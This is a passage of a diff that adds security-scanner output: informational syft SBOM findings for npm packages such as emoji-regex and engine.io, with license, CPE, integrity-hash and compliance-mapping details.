[ + "sbom", + "package" + ], + "raw": { + "id": "dc02d9fca5801675", + "name": "electron-to-chromium", + "version": "1.5.345", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/electron-to-chromium@1.5.345", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz", + "integrity": "sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d03ffa53b9f68b04", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: emoji-regex 10.6.0", + "title": "emoji-regex 10.6.0", + "description": "Package discovered: emoji-regex 10.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "20a2cf9e55a512fb", + "name": "emoji-regex", + "version": "10.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/emoji-regex@10.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz", + "integrity": "sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "40ac25fe3302f6ab", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: emoji-regex 8.0.0", + "title": "emoji-regex 8.0.0", + "description": "Package discovered: emoji-regex 8.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6d4a27855f2a5940", + "name": "emoji-regex", + "version": "8.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/emoji-regex@8.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2e49a0ba02ec88d9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: emoji-regex 9.2.2", + "title": "emoji-regex 9.2.2", + "description": "Package discovered: emoji-regex 9.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6d104925e5745212", + "name": "emoji-regex", + "version": "9.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/emoji-regex@9.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "dd09559c2dcfbb7e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: encodeurl 2.0.0", + "title": "encodeurl 2.0.0", + "description": "Package discovered: encodeurl 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c88c25f6c6e59773", + "name": "encodeurl", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/encodeurl@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aefcf9a0415c9a67", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: end-of-stream 1.4.5", + "title": "end-of-stream 1.4.5", + "description": "Package discovered: end-of-stream 1.4.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2e1781643534e89c", + "name": "end-of-stream", + "version": "1.4.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/end-of-stream@1.4.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dependencies": { + "once": "^1.4.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8a726054b0a99ad6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: engine.io 6.6.7", + "title": "engine.io 6.6.7", + "description": "Package discovered: engine.io 6.6.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "560e37438ce30be1", + "name": "engine.io", + "version": "6.6.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/engine.io@6.6.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz", + "integrity": "sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ==", + "dependencies": { + "@types/cors": "^2.8.12", + "@types/node": ">=10.0.0", + "@types/ws": "^8.5.12", + "accepts": "~1.3.4", + "base64id": "2.0.0", + "cookie": "~0.7.2", + "cors": "~2.8.5", + "debug": "~4.4.1", + "engine.io-parser": "~5.2.1", + "ws": "~8.18.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "765ac1332452cd05", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: engine.io-client 6.6.4", + "title": "engine.io-client 6.6.4", + "description": "Package discovered: engine.io-client 6.6.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "930ef4784cebfb4a", + "name": "engine.io-client", + "version": "6.6.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/engine.io-client@6.6.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz", + "integrity": "sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw==", + "dependencies": { + "@socket.io/component-emitter": "~3.1.0", + "debug": "~4.4.1", + "engine.io-parser": "~5.2.1", + "ws": "~8.18.3", + "xmlhttprequest-ssl": "~2.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b2a7fb31422c2427", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: engine.io-parser 5.2.3", + "title": "engine.io-parser 5.2.3", + "description": "Package discovered: engine.io-parser 